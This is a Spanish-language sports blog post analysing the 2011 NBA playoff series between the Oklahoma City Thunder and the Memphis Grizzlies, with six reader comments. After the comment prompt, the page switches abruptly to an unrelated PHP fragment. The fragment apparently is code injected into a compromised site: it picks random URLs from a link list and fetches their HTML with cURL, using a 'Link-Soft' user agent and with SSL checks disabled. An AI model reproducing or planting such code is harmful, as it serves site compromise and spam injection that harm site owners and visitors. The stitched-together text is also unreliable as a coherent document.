Segunda ronda Oeste: Thunder 4 – Grizzlies 3

17 de May de 2011 por TheDeerHunter

Al menos acertamos en una cosa. Ha sido la semifinal de conferencia más atractiva de todas.

Dos modelos a priori opuestos. Enfoque colectivo frente al individual. Excelencia exterior contra potencia interior… Pero también muy semejantes. Ambos son eminentemente ofensivos y muy físicos. Defensa intensa y juego de transición. Jóvenes y hambrientos, que vienen desplegando un juego sin fisuras, sin complejos y sin presión. Se trataba de escribir uno de los capítulos más brillantes de la historia de las respectivas franquicias y nadie les exije mucho más que esto.
Llegaban al cruce con muy buenas sensaciones. Dos buenos equipos como Spurs y Nuggets habían sido, con total justicia, sus víctimas en primera ronda. Así que se esperaba máxima igualdad. Muy pocos vaticinaban que la serie se resolviera en menos de 6 partidos.

Especial seguimiento a Durant y Randolph, dos de los más destacados reclamos de estos playoffs. Durantula está llamado a ser uno de los mejores jugadores de la esta década y de él se deben esperar grandes cosas incluso con su juventud y en su segunda participación en las eliminatorias por el título. Zach llegó a “morir” a Memphis, pero en la tranquilidad de esta franquicia ha renacido sentando la cabeza y destapando el tarro de la esencias del inmenso jugador que algunos apostaron que iba a ser. Ninguno de los dos lo tenía fácil a priori, frente a los perros de presa de perímetro en los Grizzlies y la batería de monstruos defensivos interiores de los Thunder. Sin embargo los dos superan el examen con nota. Podemos decir que el mejor duelo individual de esta postemporada ha terminado en tablas.

Señalar la clave de cómo se ha resuelto todo con un margen tan estrecho es complicado. Las diferencias han sido sutiles y cualquiera de los dos hubiera merecido pasar. En su día partíamos de la premisa de que lo que rodea a Randolph es superior a lo que rodea Durant. Tanto la intendencia, como la segunda unidad ha sido productiva en Memphis durante todo el curso. En Oklahoma, por contra, todo se ha reducido a Durant&Westbrook más un trabajo específico de Ibaka y Harden. Poco más.
Sin embargo Ibaka ha tenido problemas físicos y Mayo ha aumentado su peso específico en esta serie. Ni lo uno ha sido un incidente  insalvable para Thunder ni lo otro ha sido suficiente para Grizzlies. Nuestra premisa no era del todo exacta.
Mientras que Scott Brooks ha ido encontrando soluciones alternativas en Collison, Harden e incluso Maynor y Cook, los Grizzlies han ido perdiendo gente por el camino. El rendimiento de Battier, Vasquez, Arthur o Young ha ido de más a menos llegando a ser casi nulo en el último partido. Eso ha desequilibrado la balanza a favor de las mejores individualidades.

MVP: No caeremos en el error de quedarnos únicamente con Durant como MVP para su equipo. Como ejecutor hay pocos mejores que Durant y así lo han demostrado sus 26.4 puntos 9.1 rebotes y 1 tapón por partido, aunque únicamente ha repartido asistencia y media. Russell Westbrook, cuando se pone a ello complementa a la perfección a su compañero y así lo vimos en el decisivo séptimo encuentro. 24 puntos, 5.3 rebotes, 7.6 asistencias y 1.7 robos. La mejor pareja del Oeste y veremos si no termina siendo de esta liga.

La sorpresa: La importancia de Nick Collison en esta serie ha marcado la diferencia entre el éxito y el fracaso. Llama la atención lo decisivos que están siendo este año algunos jugadores de corte oscuro. Collison pocas veces brilla con luz propia y sus números rara vez deslumbran. Sin embargo si los Thunder logran algo esta campaña será en buena parte por su culpa.

La decepción: Factor clave en negativo ha sido un hombre del que se llegó a hablar para mejor 6º hombre del año. A Darrell Arthur le ha venido grande esta serie. Es difícil aprovechar las migajas que deja otro jugador en estado de gracia en su misma posición, pero ocasiones como esta es posible que no vaya a disfrutar muchas.

El mayor esfuerzo en vano: Incluiríamos a la parejita de Memphis en esta categoría, pero imaginando el contratazo que va a firmar Marc muy en vano no podemos considerar su esfuerzo. Zach Randolph termina firmando 23 puntos, más de 12 rebotes, casi 2 asistencias y 1 tapón más el título honorífico de haber sido el mejor de las dos primeras fases por el título.

Comenta

6 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Que posición le tocará a Timberwolves esta noche??? Optarán por Ricky como base titular si les toca el pick 1????

      Citar

  2. GreenPride dice:
    #2

    Pues gran serie que se ha decidido probablemente en ese 4º partido de 3 prórrogas en el que Memphis pudo haberse colocado 3-1 pero acabó 2-2 y en los 2 últimos partidos en Oklahoma no ha tenido opción. Durant ha estado fenomenal casi toda la serie (menos en el 6º) y eso que a ratos Westbrook ha decidido jugar él sólo y no pasarle la bola. Cuando Westbrook ha jugado más de director, KD e incluso Harden han llevado a su equipo para adelante. Importantísimo papel de Collison haciendo el trabajo oscuro de defender a un Z-Bo que ha estado espectacular sobre todo en las victorias de los Grizzlies lo que habla bien claro de su importancia. Junto a Marc han martilleado al gran juego interior defensivo de los Thunder que se las han visto y deseado para pararles consiguiéndolo sólo muy de vez en cuando. El gran problema para los Grizzlies ha sido su ataque exterior. Ni Tony Allen, ni Battier, ni Sam Young (horrible serie la suya) las meten de lejos y sin esos tiros exteriores la defensa de OKC ha podido cerrarse mucho sobre la pareja interior. Temporadón de Memphis que si retiene a Marc será un equipo muy a tener en cuenta en el futuro. Y por los Thunder, sigue su aventura, confirmación de que son probablemente el equipo del futuro pero que a lo mejor son también del presente, veremos a ver si Durantula se la puede jugar a los Mavs y plantarse en las finales

      Citar

  3. Victor dice:
    #3

    Arthur se lesiono un dedo de la mano buena el el sexto partido de primera ronda, y ha arrastrado molestias toda la serie mem-okc

      Citar

  4. xapa_croack dice:
    #4

    nada de la loteria del draft :((

      Citar

  5. Denise dice:
    #5

    Fenomenal serie, de las mejores de la última decada en mi humilde opinión.

      Citar

  6. Vader dice:
    #6

    “Menudo” esta hecho Barea… 21 puntos en 16 minutos. Dallas 1 OKC 0.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>